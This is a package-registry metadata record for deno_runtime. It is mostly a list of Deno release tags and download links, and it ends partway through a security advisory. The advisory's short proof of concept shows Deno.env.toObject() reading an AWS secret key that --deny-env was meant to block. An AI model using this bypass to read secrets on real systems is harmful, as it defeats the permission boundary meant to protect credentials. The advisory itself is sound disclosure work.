04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-29T14:58:13.953Z","dependent_packages_count":24,"downloads":608969,"downloads_period":"total","dependent_repos_count":36,"rankings":{"downloads":5.593924716715999,"dependent_repos_count":4.835815539206891,"dependent_packages_count":1.7123287671232876,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.162618784527705},"purl":"pkg:cargo/deno_runtime","advisories":[{"uuid":"GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","url":"https://github.com/advisories/GHSA-7w8p-chxq-2789","title":"Deno.env.toObject() ignores the variables listed in --deny-env and returns all environment variables","description":"### Summary\nThe [Deno.env.toObject](https://docs.deno.com/api/deno/~/Deno.Env.toObject) method ignores any variables listed in the `--deny-env` option of the `deno run` command. When looking at the [documentation](https://docs.deno.com/runtime/fundamentals/security/#environment-variables) of the `--deny-env` option this might lead to a false impression that variables listed in the option are impossible to read.\n\n### PoC\n\n```\nexport AWS_SECRET_ACCESS_KEY=my-secret-aws-key\n\n# Works as expected. The program stops with a \"NotCapable\" error message\necho 'console.log(Deno.env.get(\"AWS_SECRET_ACCESS_KEY\"));' | deno run \\\n  --allow-env \\\n  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -\n\n# All enviroment variables are printed and the --deny-env list is completely disregarded\necho 'console.log(Deno.env.toObject());' | deno run \\\n  --allow-env \\\n  